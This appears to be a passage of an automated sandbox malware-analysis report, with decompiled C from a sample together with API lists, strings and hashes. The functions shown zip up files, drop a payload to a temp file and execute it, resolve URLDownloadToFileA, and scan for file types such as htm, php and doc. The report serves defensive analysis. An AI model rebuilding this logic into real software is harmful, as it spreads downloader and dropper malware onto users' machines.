				_t199 = _t197 & 0xffffff00 | _t133 == 0xffffffff | _t133 & 0xffffff00 | _t133 == 0x00000000;
				if(_t199 == 0) {
					_t137 = CreateFileA(_a8, 0x40000000, 3, 0, 2, 0x80, 0);
					_t214 = _t213 - 0x1c;
					_v1176 = _t137;
					if((_t199 & 0xffffff00 | _t137 == 0xffffffff | _t137 & 0xffffff00 | _t137 == 0x00000000) == 0) {
						_t204 =  &_v60;
						asm("cld");
						_t140 = memset(_t204, 0, 7 << 2);
						 *((short*)(_t204 + 7)) = 0;
						_t206 =  &_v140;
						_t141 = memset(_t206, _t140, 0xb << 2);
						 *((short*)(_t206 + 0xb)) = 0;
						_t208 =  &_v92;
						memset(_t208, _t141, 5 << 2);
						 *((short*)(_t208 + 5)) = 0;
						_v60 = 0x4034b50;
						_v56 = 0xa;
						_v134 = 0xa;
						_v54 = 0;
						_v132 = 0;
						_v52 = 0;
						_v130 = 0;
						E0040814C( &_v50,  &_v48);
						_v128 = _v50 & 0x0000ffff;
						_v126 = _v48;
						_t148 = E004081D8(_t211);
						_v46 = _t148;
						_v124 = _t148;
						_t149 = GetFileSize(_t211, 0);
						_v42 = _t149;
						_v120 = _t149;
						_t150 = GetFileSize(_t211, 0);
						_v38 = _t150;
						_v116 = _t150;
						_t151 = _a12;
						_v1212 = _t151;
						L0040C310();
						_v34 = _t151;
						_v112 = _t151;
						_v32 = 0;
						_v110 = 0;
						_v98 = 0;
						WriteFile(_v1176,  &_v60, 0x1e,  &_v1168, 0);
						_t155 = _a12;
						_v1216 = _t155;
						L0040C310();
						WriteFile(_v1176, _a12, _t155,  &_v1168, 0);
						_t159 = _a12;
						_v1220 = _t159;
						L0040C310();
						_t74 = _t159 + 0x1e; // 0x1e
						_t187 = _t74;
						SetFilePointer(_t211, 0, 0, 0);
						_t225 = _t214 + 0x24 - 0xffffffffffffffbc;
						_t210 =  &_v1164;
						while(1) {
							_v1168 = 0;
							_t162 = ReadFile(_t211, _t210, 0x400,  &_v1168, 0);
							_t226 = _t225 - 0x14;
							if(_t162 == 0 || _v1168 == 0) {
								break;
							}
							WriteFile(_v1176, _t210, _v1168,  &_v1172, 0);
							_t225 = _t226 - 0x14;
							_t187 = _t187 + _v1168;
						}
						_v76 = _t187;
						_v140 = 0x2014b50;
						_v136 = 0x14;
						_v104 = 0;
						_v102 = 0x20;
						WriteFile(_v1176,  &_v140, 0x2e,  &_v1168, 0);
						_t167 = _a12;
						_v1224 = _t167;
						L0040C310();
						WriteFile(_v1176, _a12, _t167,  &_v1168, 0);
						_t171 = _a12;
						_v1228 = _t171;
						L0040C310();
						_t230 = _t226 - 0xfffffffffffffff8;
						_v92 = 0x6054b50;
						_v88 = 0;
						_v86 = 0;
						_v84 = 1;
						_v82 = 1;
						_v80 = _t187 + 0x2e + _t171 - _v76;
						_v72 = 0;
						_v1216 = 0;
						_v1220 =  &_v1168;
						_v1224 = 0x16;
						_v1228 =  &_v92;
						 *_t230 = _v1176;
						WriteFile(??, ??, ??, ??, ??);
						_t231 = _t230 - 0x14;
						 *_t231 = _v1176;
						CloseHandle(??);
						 *(_t231 - 4) = _t211;
						CloseHandle(??);
						_t190 = 1;
					} else {
						CloseHandle(_t211);
						_t190 = 0;
					}
				}
				return _t190;
			}

0x0040829c
0x004082de
0x004082e3
0x004082e6
0x004082f3
0x004082f8
0x004082fa
0x00408336
0x0040833b
0x0040833e
0x00408351
0x00408368
0x0040836b
0x00408376
0x00408378
0x0040837d
0x00408388
0x0040838a
0x0040838f
0x00408397
0x00408399
0x0040839e
0x004083a5
0x004083ab
0x004083b4
0x004083ba
0x004083c0
0x004083c6
0x004083dc
0x004083e5
0x004083ec
0x004083f3
0x004083f8
0x004083fb
0x00408409
0x00408411
0x00408414
0x00408422
0x0040842a
0x0040842d
0x00408430
0x00408433
0x00408436
0x0040843e
0x00408442
0x00408446
0x0040844c
0x00408452
0x00408480
0x00408488
0x0040848b
0x0040848e
0x004084bc
0x004084c4
0x004084c7
0x004084ca
0x004084d2
0x004084d2
0x004084f0
0x004084f5
0x004084f8
0x004084fe
0x004084fe
0x00408529
0x0040852e
0x00408533
0x00000000
0x00000000
0x00408567
0x0040856c
0x0040856f
0x0040856f
0x00408577
0x0040857a
0x00408584
0x0040858d
0x00408593
0x004085c7
0x004085d2
0x004085d5
0x004085d8
0x00408606
0x0040860e
0x00408611
0x00408614
0x00408619
0x0040861e
0x00408625
0x0040862b
0x00408631
0x00408637
0x00408642
0x00408645
0x0040864b
0x00408659
0x0040865d
0x00408668
0x00408672
0x00408675
0x0040867a
0x00408683
0x00408686
0x0040868e
0x00408691
0x00408699
0x00408353
0x00408356
0x0040835e
0x0040835e
0x00408351
0x004086a7

APIs

CreateFileA.KERNEL32 ref: 004082DE
CreateFileA.KERNEL32 ref: 00408336
CloseHandle.KERNEL32 ref: 00408356
GetFileSize.KERNEL32 ref: 00408409
GetFileSize.KERNEL32 ref: 00408422
lstrlen.KERNEL32 ref: 00408436
WriteFile.KERNEL32 ref: 00408480
lstrlen.KERNEL32 ref: 0040848E
WriteFile.KERNEL32 ref: 004084BC
lstrlen.KERNEL32 ref: 004084CA
SetFilePointer.KERNEL32 ref: 004084F0
ReadFile.KERNEL32 ref: 00408529

Strings

, xrefs: 00408593
., xrefs: 004085AC

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: File$lstrlen$CreateSizeWrite$CloseHandlePointerRead
String ID: $.
API String ID: 2059494333-3929174939
Opcode ID: 555209977dd7f61af360ae51e36ae12b9c11cae2c95c9b266d9ad5083ad1dd06
Instruction ID: 330a0651d7a757380811ed2d4a39bd4f834bab233f08717d63250c6a01a72e4e
Opcode Fuzzy Hash: 555209977dd7f61af360ae51e36ae12b9c11cae2c95c9b266d9ad5083ad1dd06
Instruction Fuzzy Hash: 17B1DDB4804304DBDB10EF65C59579EBBF4BF44304F00896EE898A7391E7799648CF96

Uniqueness

Uniqueness Score: -1.00%

Function 1000157E Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 131
fileprocesssynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E1000157E(signed int __edx, int _a4) {
				void* _v16;
				char _v300;
				char _v572;
				char _v1596;
				short _v1628;
				intOrPtr _v1632;
				long _v1648;
				long _v1652;
				CHAR* _v1656;
				CHAR* _v1660;
				char _v1676;
				struct _PROCESS_INFORMATION _v1692;
				char _v1696;
				void* _v1728;
				void* _v1732;
				void* _v1736;
				void* _v1740;
				CHAR* _v1744;
				intOrPtr _v1748;
				CHAR* _v1752;
				CHAR* _v1756;
				char* _v1760;
				CHAR* _v1764;
				CHAR* _v1768;
				signed int _t64;
				CHAR* _t67;
				int _t73;
				int _t74;
				CHAR* _t86;
				CHAR* _t87;
				CHAR* _t88;
				signed int _t89;
				CHAR* _t91;
				CHAR* _t92;
				CHAR* _t93;
				struct _STARTUPINFOA* _t94;
				void* _t95;
				void* _t99;
				CHAR** _t100;
				CHAR** _t101;

				_t89 = __edx;
				_t86 =  &_v300;
				GetTempPathA(0x104, _t86);
				_t93 =  &_v572;
				GetTempFileNameA(_t86, 0x10005000, 0, _t93);
				_t64 = CreateFileA(_t93, 0x40000000, 1, 0, 2, 0x80, 0);
				_t99 = _t95 - 0x698;
				_t92 = _t64;
				if(((_t64 & 0xffffff00 | _t64 == 0xffffffff | _t89 & 0xffffff00 | _t64 == 0x00000000) & 0x00000001) == 0) {
					_t87 =  &_v1596;
					while(1) {
						_v1744 = 0;
						_v1748 = 0x400;
						_v1752 = _t87;
						_t67 = _a4;
						_v1756 = _t67;
						L10003004();
						_t100 = _t99 - 0x10;
						_t91 = _t67;
						if(_t67 <= 0) {
							break;
						}
						_v1756 = 0;
						_v1760 =  &_v1696;
						_v1764 = _t91;
						_v1768 = _t87;
						 *_t100 = _t92;
						WriteFile(??, ??, ??, ??, ??);
						_t99 = _t100 - 0x14;
					}
					 *_t100 = _t92;
					CloseHandle(??);
					_t101 = _t100 - 4;
					_t94 =  &_v1676;
					_v1764 = 0x44;
					_v1768 = 0;
					 *_t101 = _t94;
					memset(??, ??, ??);
					_v1676 = 0x44;
					_v1632 = 0x87;
					_v1656 = 0;
					_v1660 = 0;
					_v1648 = 1;
					_v1652 = 1;
					_v1628 = 0;
					_v1764 =  &_v572;
					_v1768 = 0x10005004;
					_t88 =  &_v1596;
					 *_t101 = _t88;
					wsprintfA(??, ??);
					_t73 = CreateProcessA(0, _t88, 0, 0, 0, 0, 0, 0, _t94,  &_v1692);
					_t99 = _t101 - 0x28;
					if(_t73 == 0) {
						L7:
						_t74 = _a4;
						_v1764 = _t74;
						L10003014();
						if(_t92 != 0) {
							_t74 = DeleteFileA( &_v572);
						}
						L9:
						return _t74;
					}
					WaitForSingleObject(_v1692.hProcess, 0xffffffff);
					CloseHandle(_v1692.hThread);
					CloseHandle(_v1692);
					DeleteFileA( &_v572);
					_t74 = _a4;
					_v1764 = _t74;
					L10003014();
					goto L9;
				}
				_t92 = 0;
				goto L7;
			}

0x1000157e
0x1000158a
0x1000159b
0x100015a3
0x100015c0
0x100015fb
0x10001600
0x10001603
0x10001614
0x10001620
0x10001626
0x10001626
0x1000162e
0x10001636
0x1000163a
0x1000163d
0x10001640
0x10001645
0x10001648
0x1000164c
0x00000000
0x00000000
0x1000164e
0x1000165c
0x10001660
0x10001664
0x10001668
0x1000166b
0x10001670
0x10001670
0x10001675
0x10001678
0x1000167d
0x10001680
0x10001686
0x1000168e
0x10001696
0x10001699
0x1000169e
0x100016a8
0x100016b2
0x100016bc
0x100016c6
0x100016d0
0x100016da
0x100016e9
0x100016ed
0x100016f5
0x100016fb
0x100016fe
0x1000174c
0x10001751
0x10001756
0x100017b4
0x100017b4
0x100017b7
0x100017ba
0x100017c4
0x100017cf
0x100017d4
0x100017d7
0x100017de
0x100017de
0x10001769
0x1000177a
0x1000178b
0x1000179c
0x100017a4
0x100017a7
0x100017aa
0x00000000
0x100017af
0x10001616
0x00000000

APIs

GetTempPathA.KERNEL32 ref: 1000159B
GetTempFileNameA.KERNEL32 ref: 100015C0
CreateFileA.KERNEL32 ref: 100015FB
WriteFile.KERNEL32 ref: 1000166B
CloseHandle.KERNEL32 ref: 10001678
memset.MSVCRT ref: 10001699
wsprintfA.USER32 ref: 100016FE
CreateProcessA.KERNEL32 ref: 1000174C
WaitForSingleObject.KERNEL32 ref: 10001769
CloseHandle.KERNEL32 ref: 1000177A
CloseHandle.KERNEL32 ref: 1000178B
DeleteFileA.KERNEL32 ref: 1000179C
closesocket.WS2_32 ref: 100017AA
closesocket.WS2_32 ref: 100017BA
DeleteFileA.KERNEL32 ref: 100017CF

Strings

D, xrefs: 10001686
D, xrefs: 1000169E

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: File$CloseHandle$CreateDeleteTempclosesocket$NameObjectPathProcessSingleWaitWritememsetwsprintf
String ID: D$D
API String ID: 3923095081-143366177
Opcode ID: e02e9eaa58c48b76b552a7f084af21d14f79f840054da78fec714ba6f5058f6d
Instruction ID: 79cbd1979514fdd573897922439d2e9c43dfc8d5b4461daef0bd91c82e7501b0
Opcode Fuzzy Hash: e02e9eaa58c48b76b552a7f084af21d14f79f840054da78fec714ba6f5058f6d
Instruction Fuzzy Hash: 57512FB48097049EE710EF24C98939FBBF4EF84398F40895CE89857255D77A9698CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00406F1C Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 123librarystringfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00406F5D
GetProcAddress.KERNEL32 ref: 00406F7A
FreeLibrary.KERNEL32 ref: 00406F8E
GetSystemDirectoryA.KERNEL32 ref: 00406FB1
lstrlen.KERNEL32 ref: 00406FBC
lstrcat.KERNEL32 ref: 00406FD9
_mbscat.MSVCRT ref: 00407014
DeleteFileA.KERNEL32 ref: 00407059

Strings

URLDownloadToFileA, xrefs: 00406F6F
D, xrefs: 00407089
urlmon.dll, xrefs: 00406F56
D, xrefs: 00407071

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Library$AddressDeleteDirectoryFileFreeLoadProcSystem_mbscatlstrcatlstrlen
String ID: D$D$URLDownloadToFileA$urlmon.dll
API String ID: 2488436691-568779862
Opcode ID: 74e3270b2b6714ab6cf254762190580809479b14a45afd7e6c1fb6f99d803b71
Instruction ID: 6020ed59d1fb2f3a26d031d0468f3da87cf9bf9a4133c77db0aeb5110a75bae0
Opcode Fuzzy Hash: 74e3270b2b6714ab6cf254762190580809479b14a45afd7e6c1fb6f99d803b71
Instruction Fuzzy Hash: F451E0B0804744CBD750EF29D98579EBBF0BF44314F404A6EE8899B381D7789688CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00402120 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402120(intOrPtr _a4) {
				intOrPtr _v76;
				char _v82;
				short _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v104;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				void* _t69;
				short* _t70;
				signed int _t71;
				intOrPtr _t72;
				void* _t73;
				void* _t74;
				intOrPtr* _t75;

				_t72 = _a4;
				_t69 =  &_v92;
				asm("cld");
				memset(_t69, 0, 3 << 2);
				_t75 = _t74 + 0xc;
				_t70 = _t69 + 3;
				 *_t70 = 0;
				 *((char*)(_t70 + 2)) = 0;
				_v92 = 0x6b6c7665;
				_v88 = 0x686f6472;
				_v84 = 0x706c;
				_v82 = 0;
				_t9 =  &_v92; // 0x6b6c7665
				_v104 = _t9;
				 *_t75 = 0x40e44a;
				E00404C6A();
				E00402106();
				_t64 =  *0x414008;
				_t71 = 0;
				do {
					_t67 = _t64 * 0xcccccccd >> 0x20 >> 3;
					 *((intOrPtr*)(_t73 + _t71 * 4 - 0x48)) = _t64 - _t67 + _t67 * 4 + _t67 + _t67 * 4;
					_t64 = _t67;
					_t71 = _t71 + 1;
				} while (_t71 <= 9);
				_t68 = 0;
				do {
					 *((char*)(_t68 + _t72)) =  *( *((intOrPtr*)(_t73 + _t68 * 4 - 0x48)) +  &_v92) & 0x000000ff;
					_t68 = _t68 + 1;
				} while (_t68 <= 9);
				 *((char*)(_t72 + 0xa)) = 0;
				if(_v76 != 0) {
					if(_v76 != 1) {
						if(_v76 != 2) {
							if(_v76 != 3) {
								if(_v76 != 4) {
									if(_v76 != 5) {
										if(_v76 != 6) {
											_t53 =  *0x40d07c; // 0x40e446
											_v104 = _t53;
											 *_t75 = _t72;
											L0040C208();
											return _t53;
										}
										_t54 =  *0x40d078; // 0x40e440
										_v104 = _t54;
										 *_t75 = _t72;
										L0040C208();
										return _t54;
									}
									_t55 =  *0x40d074; // 0x40e43c
									_v104 = _t55;
									 *_t75 = _t72;
									L0040C208();
									return _t55;
								}
								_t56 =  *0x40d070; // 0x40e437
								_v104 = _t56;
								 *_t75 = _t72;
								L0040C208();
								return _t56;
							}
							_t57 =  *0x40d06c; // 0x40e432
							_v104 = _t57;
							 *_t75 = _t72;
							L0040C208();
							return _t57;
						}
						_t58 =  *0x40d068; // 0x40e42e
						_v104 = _t58;
						 *_t75 = _t72;
						L0040C208();
						return _t58;
					}
					_t59 =  *0x40d064; // 0x40e429
					_v104 = _t59;
					 *_t75 = _t72;
					L0040C208();
					return _t59;
				}
				_t60 =  *0x40d060; // 0x40e424
				_v104 = _t60;
				 *_t75 = _t72;
				L0040C208();
				return _t60;
			}

0x00402129
0x0040212c
0x0040212f
0x0040213a
0x0040213a
0x0040213a
0x0040213c
0x00402141
0x00402145
0x0040214c
0x00402153
0x00402159
0x0040215d
0x00402160
0x00402164
0x0040216b
0x00402170
0x00402175
0x0040217b
0x00402185
0x00402189
0x00402193
0x00402197
0x00402199
0x0040219a
0x0040219f
0x004021a4
0x004021ad
0x004021b0
0x004021b1
0x004021b6
0x004021be
0x004021da
0x004021f6
0x0040220f
0x00402228
0x00402241
0x0040225a
0x0040226f
0x00402274
0x00402278
0x0040227b
0x00000000
0x0040227b
0x0040225c
0x00402261
0x00402265
0x00402268
0x00000000
0x00402268
0x00402243
0x00402248
0x0040224c
0x0040224f
0x00000000
0x0040224f
0x0040222a
0x0040222f
0x00402233
0x00402236
0x00000000
0x00402236
0x00402211
0x00402216
0x0040221a
0x0040221d
0x00000000
0x0040221d
0x004021f8
0x004021fd
0x00402201
0x00402204
0x00000000
0x00402204
0x004021dc
0x004021e1
0x004021e5
0x004021e8
0x00000000
0x004021e8
0x004021c0
0x004021c5
0x004021c9
0x004021cc
0x00000000

APIs

_mbscat.MSVCRT ref: 004021CC
_mbscat.MSVCRT ref: 004021E8
_mbscat.MSVCRT ref: 00402204

Strings

F@, xrefs: 0040226F
2@, xrefs: 00402211
.@, xrefs: 004021F8
7@, xrefs: 0040222A
@@, xrefs: 0040225C
)@, xrefs: 004021DC
evlkrdohlp, xrefs: 0040215D
$@, xrefs: 004021C0
<@, xrefs: 00402243

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: _mbscat
String ID: $@$)@$.@$2@$7@$<@$@@$F@$evlkrdohlp
API String ID: 134015809-3435826350
Opcode ID: ba1be5f7a4b05f6ad6f1eb42656a354e92ad3395ec866426798a2edddf5be352
Instruction ID: 21a54818e9aca3eeccc7b18a3caaa5206cc12068587b62876ebf60fed946ae37
Opcode Fuzzy Hash: ba1be5f7a4b05f6ad6f1eb42656a354e92ad3395ec866426798a2edddf5be352
Instruction Fuzzy Hash: 7D411A70E04244DBCB509FA9D68565EBBF0AB45708F10457FE498AB3C1D3789986CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00403622 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 103
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00403622(signed int __eax, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				char _v300;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v324;
				intOrPtr _v332;
				intOrPtr _v340;
				intOrPtr _v348;
				intOrPtr _v356;
				intOrPtr _v364;
				intOrPtr _v372;
				intOrPtr _v380;
				void* __ebx;
				signed int _t32;
				char _t37;
				char* _t38;
				intOrPtr _t41;
				signed int _t42;
				intOrPtr _t43;
				char _t44;
				char* _t45;
				void* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;

				_t42 = __edx;
				_t32 = __eax;
				_t47 = _t46 - 0x12c;
				_t43 = _a4;
				_t41 = _a8;
				_t37 = 0;
				_t44 = 0xffffffff;
				if( *((char*)(_t41 + 0x2c)) == 0) {
					L4:
					if(_t44 >= 0) {
						_v308 = 0x103;
						_v312 = _t41 + _t44 + 0x2d;
						_t38 =  &_v300;
						 *_t47 = _t38;
						L0040C350();
						_t48 = _t47 - 0xc;
						 *_t48 = _t38;
						_t32 = CharLowerA(??);
						_t47 = _t48 - 4;
					} else {
						_v300 = 0;
					}
					_v324 = 0x40efb2;
					_t45 =  &_v300;
					 *_t47 = _t45;
					L0040C318();
					_t49 = _t47 - 8;
					if(_t32 == 0) {
						L15:
						 *_t49 = _t43;
						_t32 =  ~((E00402F2E(1, _t42) & 0xffffff00 | _t34 != 0x00000000) & 0x000000ff);
						if((0x00000001 & _t32) == 1) {
							 *_t49 = _t43;
							_t32 = E0040307E(_t42);
						}
						goto L17;
					} else {
						_v332 = 0x40efb7;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v340 = 0x40efbb;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v348 = 0x40efbf;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v356 = 0x40efc3;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v364 = 0x40efc7;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v372 = 0x40ee83;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v380 = 0x40efca;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 != 0) {
							L17:
							return _t32;
						}
						goto L15;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					if( *((char*)(_t41 + _t37 + 0x2c)) == 0x2e) {
						_t44 = _t37;
					}
					_t37 = _t37 + 1;
					_t42 = _t42 & 0xffffff00 |  *((char*)(_t41 + _t37 + 0x2c)) != 0x00000000;
					_t32 = _t32 & 0xffffff00 | _t37 - 0x000000fe <= 0x00000000;
				} while ((_t42 & _t32) != 0);
				goto L4;
			}

0x00403622
0x00403622
0x00403628
0x0040362e
0x00403631
0x00403634
0x00403639
0x00403642
0x00403663
0x00403665
0x00403670
0x0040367c
0x00403680
0x00403686
0x00403689
0x0040368e
0x00403691
0x00403694
0x00403699
0x00403667
0x00403667
0x00403667
0x004036a1
0x004036a9
0x004036af
0x004036b2
0x004036b7
0x004036bc
0x00403767
0x00403767
0x00403777
0x0040377e
0x00403780
0x00403783
0x00403783
0x00000000
0x004036c2
0x004036c2
0x004036ca
0x004036cd
0x004036d2
0x004036d7
0x00000000
0x00000000
0x004036dd
0x004036e5
0x004036e8
0x004036ed
0x004036f2
0x00000000
0x00000000
0x004036f4
0x004036fc
0x004036ff
0x00403704
0x00403709
0x00000000
0x00000000
0x0040370b
0x00403713
0x00403716
0x0040371b
0x00403720
0x00000000
0x00000000
0x00403722
0x0040372a
0x0040372d
0x00403732
0x00403737
0x00000000
0x00000000
0x00403739
0x00403741
0x00403744
0x00403749
0x0040374e
0x00000000
0x00000000
0x00403750
0x00403758
0x0040375b
0x00403760
0x00403765
0x00403788
0x0040378f
0x0040378f
0x00000000
0x00403765
0x00000000
0x00000000
0x00000000
0x00403644
0x00403644
0x00403649
0x0040364b
0x0040364b
0x0040364d
0x00403653
0x0040365c
0x0040365f
0x00000000

APIs

lstrcpyn.KERNEL32 ref: 00403689
CharLowerA.USER32 ref: 00403694
lstrcmp.KERNEL32 ref: 004036B2
lstrcmp.KERNEL32 ref: 004036CD
lstrcmp.KERNEL32 ref: 004036E8
lstrcmp.KERNEL32 ref: 004036FF
lstrcmp.KERNEL32 ref: 00403716
lstrcmp.KERNEL32 ref: 0040372D
lstrcmp.KERNEL32 ref: 00403744
lstrcmp.KERNEL32 ref: 0040375B

Strings

php, xrefs: 00403739
doc, xrefs: 0040370B
html, xrefs: 004036A1
htm, xrefs: 004036C2
xml, xrefs: 004036F4
tbb, xrefs: 00403750
txt, xrefs: 004036DD

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcmp$CharLowerlstrcpyn
String ID: doc$htm$html$php$tbb$txt$xml
API String ID: 838419190-2496469446
Opcode ID: 224cabb6541a4449cfda70ae68bee2be7fcebbb5efeb781ad9319cfc72626951
Instruction ID: 6961f7bd5c8fa27dba0ec7a422f8e7192e07f4a6a10a31976eaf7852eedd0230
Opcode Fuzzy Hash: 224cabb6541a4449cfda70ae68bee2be7fcebbb5efeb781ad9319cfc72626951
Instruction Fuzzy Hash: FE31B1B44047409AC7107F368A8526E7EE89B4078DF01897FEC80676C2D73C8A59CB9F

Uniqueness

Uniqueness Score: -1.00%

Function 10001170 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E10001170(void* __eax) {
				void* _v20;
				short _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				short _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v192;
				int _v196;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				void* __ebx;
				char _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				signed int _t68;
				intOrPtr _t71;
				void* _t72;
				signed char _t90;
				char _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t105;
				void* _t107;
				signed int _t108;
				signed int _t114;
				void* _t118;
				signed int _t119;
				signed int _t124;
				signed int _t127;
				struct _IO_FILE* _t131;
				struct _IO_FILE* _t133;
				signed int* _t134;
				intOrPtr* _t135;
				intOrPtr* _t137;
				intOrPtr* _t138;
				signed int* _t139;

				_pop(_t130);
				_t131 = _t133;
				_push(_t107);
				_t134 = _t133 - 0xcc;
				if( *0x10006114 == 0) {
					_v112 = 0x41414141;
					_t58 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
					_t127 =  &_v112;
					_v108 = 0x41414141;
					_v104 = 0x41414141;
					_v80 = _t58;
					_t59 = M10005250; // 0x57434347
					_v100 = 0x41414141;
					_v96 = 0x41414141;
					_v76 = _t59;
					_t60 = M10005254; // 0x452d3233
					_v92 = 0x41414141;
					_v88 = 0x41414141;
					_v72 = _t60;
					_t61 = M10005258; // 0x2d322d48
					_v84 = 0x41414141;
					_v68 = _t61;
					_t62 = M1000525C; // 0x4a4c4a53
					_v64 = _t62;
					_t63 = M10005260; // 0x4854472d
					_v60 = _t63;
					_t64 = M10005264; // 0x494d2d52
